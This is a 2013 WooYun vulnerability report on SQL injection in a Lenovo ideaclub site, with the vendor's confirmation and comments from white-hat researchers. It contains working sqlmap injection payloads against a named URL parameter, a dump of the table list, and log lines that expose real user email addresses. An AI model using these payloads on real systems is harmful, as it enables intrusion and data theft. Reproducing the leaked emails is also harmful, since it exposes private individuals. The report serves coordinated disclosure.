当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035312

漏洞标题:联想安全问题八某分站SQL注射一枚(188597用户数据面临泄漏危机)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-26 15:37

修复时间:2013-10-10 15:37

公开时间:2013-10-10 15:37

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-26: 细节已通知厂商并且等待厂商处理中
2013-08-27: 厂商已经确认,细节仅向厂商公开
2013-09-06: 细节向核心白帽子及相关领域专家公开
2013-09-16: 细节向普通白帽子公开
2013-09-26: 细节向实习白帽子公开
2013-10-10: 细节向公众公开

简要描述:

今天联想终于要发礼物了,于是又有动力挖洞了,于是又挖到一个注射!

详细说明:

注射点:

http://ideaclub.lenovo.com.cn/club/index.php?m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b


参数item_id存在注射
这次很幸运 是有返回的注射哦!!!

漏洞证明:

---
Place: GET
Parameter: item_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
AND 5080=5080 AND 'HEIH'='HEIH
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
AND (SELECT 8983 FROM(SELECT COUNT(*),CONCAT(0x7162737971,(SELECT (CASE WHEN (8
983=8983) THEN 1 ELSE 0 END)),0x716f707271,FLOOR(RAND(0)*2))x FROM INFORMATION_S
CHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YRCb'='YRCb
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162737971,0x48416f6e704e75495566
,0x716f707271),NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b'
AND SLEEP(5) AND 'hKGD'='hKGD
---


web application technology: Nginx
back-end DBMS: MySQL 5.0


345个表

Database: ideaclub2
[345 tables]
+------------------------------------+
| c_activity_member |
| c_asset_tbl |
| c_asset_tbl_content_tbl |
| c_comment |
| c_config |
| c_content_tbl |
| c_content_tbl_download_tbl |
| c_content_tbl_system_menu |
| c_content_tbl_template_tbl |
| c_dictionary_map |
| c_dictionary_sort |
| c_download_tbl |
| c_evil_ip |
| c_experience_store |
| c_expstore |
| c_goods |
| c_goods_convert |
| c_goods_img |
| c_item_tbl |
| c_item_tbl_download_tbl |
| c_keywords |
| c_m_ad |
| c_m_campaisn |
| c_m_media |
| c_m_tracker |
| c_member |
| c_member_action |
| c_member_action_score |
| c_member_attention |
| c_member_bind |
| c_member_bind_douban |
| c_member_bind_qq |
| c_member_bind_renren |
| c_member_bind_sina |
| c_member_login_count |
| c_member_profile |
| c_member_score |
| c_member_verifycode |
| c_member_visit |
| c_reg_user |
| c_store_activity_comment |
| c_store_products |
| c_system_function |
| c_system_menu |
| c_system_menu_function |
| c_system_menu_template_tbl |
| c_system_role |
| c_system_role_function |
| c_system_user |
| c_system_user_role |
| c_template_tbl |
| f_common_admincp_cmenu |
| f_common_admincp_group |
| f_common_admincp_member |
| f_common_admincp_perm |
| f_common_admincp_session |
| f_common_admingroup |
| f_common_adminnote |
| f_common_advertisement |
| f_common_advertisement_custom |
| f_common_banned |
| f_common_block |
| f_common_block_favorite |
| f_common_block_item |
| f_common_block_item_data |
| f_common_block_permission |
| f_common_block_pic |
| f_common_block_style |
| f_common_block_xml |
| f_common_cache |
| f_common_card |
| f_common_card_log |
| f_common_card_type |
| f_common_connect_guest |
| f_common_credit_log |
| f_common_credit_rule |
| f_common_credit_rule_log |
| f_common_credit_rule_log_field |
| f_common_cron |
| f_common_devicetoken |
| f_common_district |
| f_common_diy_data |
| f_common_domain |
| f_common_failedlogin |
| f_common_friendlink |
| f_common_grouppm |
| f_common_invite |
| f_common_magic |
| f_common_magiclog |
| f_common_mailcron |
| f_common_mailqueue |
| f_common_member |
| f_common_member_action_log |
| f_common_member_connect |
| f_common_member_count |
| f_common_member_crime |
| f_common_member_field_forum |
| f_common_member_field_home |
| f_common_member_fivecube |
| f_common_member_grouppm |
| f_common_member_log |
| f_common_member_lottery |
| f_common_member_magic |
| f_common_member_medal |
| f_common_member_profile |
| f_common_member_profile_setting |
| f_common_member_profile_update_log |
| f_common_member_security |
| f_common_member_stat_field |
| f_common_member_status |
| f_common_member_validate |
| f_common_member_verify |
| f_common_member_verify_info |
| f_common_myapp |
| f_common_myinvite |
| f_common_mytask |
| f_common_nav |
| f_common_onlinetime |
| f_common_patch |
| f_common_plugin |
| f_common_plugin_reminder |
| f_common_pluginvar |
| f_common_process |
| f_common_regip |
| f_common_relatedlink |
| f_common_report |
| f_common_searchindex |
| f_common_secquestion |
| f_common_session |
| f_common_setting |
| f_common_smiley |
| f_common_sphinxcounter |
| f_common_stat |
| f_common_statuser |
| f_common_style |
| f_common_stylevar |
| f_common_syscache |
| f_common_tag |
| f_common_tagitem |
| f_common_task |
| f_common_taskvar |
| f_common_template |
| f_common_template_block |
| f_common_template_permission |
| f_common_uin_black |
| f_common_usergroup |
| f_common_usergroup_field |
| f_common_word |
| f_common_word_type |
| f_connect_disktask |
| f_connect_feedlog |
| f_connect_memberbindlog |
| f_connect_postfeedlog |
| f_connect_tthreadlog |
| f_forum_access |
| f_forum_activity |
| f_forum_activityapply |
| f_forum_announcement |
| f_forum_attachment |
| f_forum_attachment_0 |
| f_forum_attachment_1 |
| f_forum_attachment_2 |
| f_forum_attachment_3 |
| f_forum_attachment_4 |
| f_forum_attachment_5 |
| f_forum_attachment_6 |
| f_forum_attachment_7 |
| f_forum_attachment_8 |
| f_forum_attachment_9 |
| f_forum_attachment_exif |
| f_forum_attachment_unused |
| f_forum_attachtype |
| f_forum_bbcode |
| f_forum_collection |
| f_forum_collectioncomment |
| f_forum_collectionfollow |
| f_forum_collectioninvite |
| f_forum_collectionrelated |
| f_forum_collectionteamworker |
| f_forum_collectionthread |
| f_forum_creditslog |
| f_forum_debate |
| f_forum_debatepost |
| f_forum_faq |
| f_forum_forum |
| f_forum_forum_threadtable |
| f_forum_forumfield |
| f_forum_forumrecommend |
| f_forum_groupcreditslog |
| f_forum_groupfield |
| f_forum_groupinvite |
| f_forum_grouplevel |
| f_forum_groupuser |
| f_forum_imagetype |
| f_forum_medal |
| f_forum_medallog |
| f_forum_memberrecommend |
| f_forum_moderator |
| f_forum_modwork |
| f_forum_onlinelist |
| f_forum_order |
| f_forum_poll |
| f_forum_polloption |
| f_forum_pollvoter |
| f_forum_post |
| f_forum_post_location |
| f_forum_post_moderate |
| f_forum_post_tableid |
| f_forum_postcache |
| f_forum_postcomment |
| f_forum_postlog |
| f_forum_poststick |
| f_forum_promotion |
| f_forum_ratelog |
| f_forum_relatedthread |
| f_forum_replycredit |
| f_forum_rsscache |
| f_forum_spacecache |
| f_forum_statlog |
| f_forum_thread |
| f_forum_thread_moderate |
| f_forum_threadaddviews |
| f_forum_threadclass |
| f_forum_threadclosed |
| f_forum_threaddisablepos |
| f_forum_threadimage |
| f_forum_threadlog |
| f_forum_threadmod |
| f_forum_threadpartake |
| f_forum_threadpreview |
| f_forum_threadrush |
| f_forum_threadtype |
| f_forum_trade |
| f_forum_tradecomment |
| f_forum_tradelog |
| f_forum_typeoption |
| f_forum_typeoptionvar |
| f_forum_typevar |
| f_forum_warning |
| f_home_album |
| f_home_album_category |
| f_home_appcreditlog |
| f_home_blacklist |
| f_home_blog |
| f_home_blog_category |
| f_home_blog_moderate |
| f_home_blogfield |
| f_home_class |
| f_home_click |
| f_home_clickuser |
| f_home_comment |
| f_home_comment_moderate |
| f_home_docomment |
| f_home_doing |
| f_home_doing_moderate |
| f_home_favorite |
| f_home_feed |
| f_home_feed_app |
| f_home_follow |
| f_home_follow_feed |
| f_home_follow_feed_archiver |
| f_home_friend |
| f_home_friend_request |
| f_home_friendlog |
| f_home_notification |
| f_home_pic |
| f_home_pic_moderate |
| f_home_picfield |
| f_home_poke |
| f_home_pokearchive |
| f_home_share |
| f_home_share_moderate |
| f_home_show |
| f_home_specialuser |
| f_home_userapp |
| f_home_userappfield |
| f_home_visitor |
| f_infbox |
| f_infbox_setting |
| f_mobile_setting |
| f_plugin_wodexunzhang |
| f_plugin_wodexunzhang_ershou |
| f_plugin_wodexunzhang_fenlei |
| f_plugin_wodexunzhang_kucun |
| f_plugin_wodexunzhang_log |
| f_plugin_wodexunzhang_user |
| f_portal_article_content |
| f_portal_article_count |
| f_portal_article_moderate |
| f_portal_article_related |
| f_portal_article_title |
| f_portal_article_trash |
| f_portal_attachment |
| f_portal_category |
| f_portal_category_permission |
| f_portal_comment |
| f_portal_comment_moderate |
| f_portal_rsscache |
| f_portal_topic |
| f_portal_topic_pic |
| f_security_evilpost |
| f_security_eviluser |
| f_security_failedlog |
| f_ucenter_admins |
| f_ucenter_applications |
| f_ucenter_badwords |
| f_ucenter_domains |
| f_ucenter_failedlogins |
| f_ucenter_feeds |
| f_ucenter_friends |
| f_ucenter_mailqueue |
| f_ucenter_memberfields |
| f_ucenter_members |
| f_ucenter_members_csv |
| f_ucenter_mergemembers |
| f_ucenter_newpm |
| f_ucenter_notelist |
| f_ucenter_pm_indexes |
| f_ucenter_pm_lists |
| f_ucenter_pm_members |
| f_ucenter_pm_messages_0 |
| f_ucenter_pm_messages_1 |
| f_ucenter_pm_messages_2 |
| f_ucenter_pm_messages_3 |
| f_ucenter_pm_messages_4 |
| f_ucenter_pm_messages_5 |
| f_ucenter_pm_messages_6 |
| f_ucenter_pm_messages_7 |
| f_ucenter_pm_messages_8 |
| f_ucenter_pm_messages_9 |
| f_ucenter_protectedmembers |
| f_ucenter_settings |
| f_ucenter_sqlcache |
| f_ucenter_tags |
| f_ucenter_vars |
| ld_member_prize |
| ld_prize_config |
| ld_prize_log |
| ld_prize_setting |
| ld_prize_test |
| ld_receive_address |
| temp_common_member |
| temp_member |
| temp_un |
| tmp_id |
+------------------------------------+


188596条用户数据

15:11:37] [INFO] the SQL query used returns 188597 entries
[15:11:37] [INFO] retrieved: "1970-01-01 08:00:00","2","terry@sina.com.cn"," ...
[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","3","jiazhou@bluefocus.com...
[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","4","iori999@163.com"," ",...
[15:11:39] [INFO] retrieved: "1970-01-01 08:00:00","5","596610835@qq.com"," "...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","6","zhqchy@yahoo.vom"," "...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","7","yangyang@sina.com"," ...
[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","188","32768796@qq.com"," ...

修复方案:

过滤吧

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-27 13:54

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-26 15:40 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    我靠,你是想去联想上班了吧!哈哈!

  2. 2013-08-26 15:45 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    WooYun: 联想问题一之某内网重要服务器getshell导致疑似所有用户资料和内部绝密信息泄露 我走了小厂商?前台显示无所谓了 首页最新确认也没了。。。

  3. 2013-08-26 15:46 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @淡漠天空 这啥时候过的?给你解决了

  4. 2013-08-26 15:50 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @疯狗 tks 无意瞅了眼联想 然后@了Finger。。。。

  5. 2013-08-26 17:02 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    联想最近很火啊

  6. 2013-08-26 18:36 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    哎 啥都不想说了~~挖煤去